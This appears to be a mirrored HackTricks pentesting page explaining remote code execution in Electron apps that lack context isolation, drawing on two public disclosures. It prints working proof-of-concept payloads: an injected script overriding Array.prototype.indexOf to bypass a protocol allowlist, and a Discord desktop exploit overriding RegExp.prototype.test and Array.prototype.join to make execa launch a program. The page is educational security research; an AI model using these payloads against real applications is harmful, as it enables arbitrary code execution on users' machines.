mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-21 18:43:29 +00:00
114 lines
5.8 KiB
Markdown
114 lines
5.8 KiB
Markdown
# Electron contextIsolation RCE via preload code
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
## Example 1
|
|
|
|
Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30)
|
|
|
|
This code open http(s) links with default browser:
|
|
|
|
![](<../../../.gitbook/assets/image (768).png>)
|
|
|
|
Something like `file:///C:/Windows/systemd32/calc.exe` could be used to execute a calc, the `SAFE_PROTOCOLS.indexOf` is preventing it.
|
|
|
|
Therefore, an attacker could inject this JS code via the XSS or arbitrary page navigation:
|
|
|
|
```html
|
|
<script>
|
|
Array.prototype.indexOf = function(){
|
|
return 1337;
|
|
}
|
|
</script>
|
|
```
|
|
|
|
As the call to `SAFE_PROTOCOLS.indexOf` will return 1337 always, the attacker can bypass the protection and execute the calc. Final exploit:
|
|
|
|
```html
|
|
<script>
|
|
Array.prototype.indexOf = function(){
|
|
return 1337;
|
|
}
|
|
</script>
|
|
<a href="file:///C:/Windows/systemd32/calc.exe">CLICK</a>
|
|
```
|
|
|
|
Check the original slides for other ways to execute programs without having a prompt asking for permissions.
|
|
|
|
Apparently another way to load and execute code is to access something like `file://127.0.0.1/electron/rce.jar`
|
|
|
|
## Example 2: Discord App RCE
|
|
|
|
Example from [https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1)
|
|
|
|
When checking the preload scripts, I found that Discord exposes the function, which allows some allowed modules to be called via `DiscordNative.nativeModules.requireModule('MODULE-NAME')`, into the web page.\
|
|
Here, I couldn't use modules that can be used for RCE directly, such as _child\_process_ module, but I **found a code where RCE can be achieved by overriding the JavaScript built-in methods** and interfering with the execution of the exposed module.
|
|
|
|
The following is the PoC. I was able to confirm that the **calc** application is **popped** up when I c**all the `getGPUDriverVersions` function** which is defined in the module called "_discord\_utils_" from devTools, while **overriding the `RegExp.prototype.test` and `Array.prototype.join`**.
|
|
|
|
```javascript
|
|
RegExp.prototype.test=function(){
|
|
return false;
|
|
}
|
|
Array.prototype.join=function(){
|
|
return "calc";
|
|
}
|
|
DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions();
|
|
```
|
|
|
|
The `getGPUDriverVersions` function tries to execute the program by using the "_execa_" library, like the following:
|
|
|
|
```javascript
|
|
module.exports.getGPUDriverVersions = async () => {
|
|
if (process.platform !== 'win32') {
|
|
return {};
|
|
}
|
|
|
|
const result = {};
|
|
const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`;
|
|
|
|
try {
|
|
result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, []));
|
|
} catch (e) {
|
|
result.nvidia = {error: e.toString()};
|
|
}
|
|
|
|
return result;
|
|
};
|
|
```
|
|
|
|
Usually the _execa_ tries to execute "_nvidia-smi.exe_", which is specified in the `nvidiaSmiPath` variable, however, due to the overridden `RegExp.prototype.test` and `Array.prototype.join`, **the argument is replaced to "**_**calc**_**" in the \_execa**\_**'s internal processing**.
|
|
|
|
Specifically, the argument is replaced by changing the following two parts.
|
|
|
|
[https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36](https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36)
|
|
|
|
[https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L55](https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L55)
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|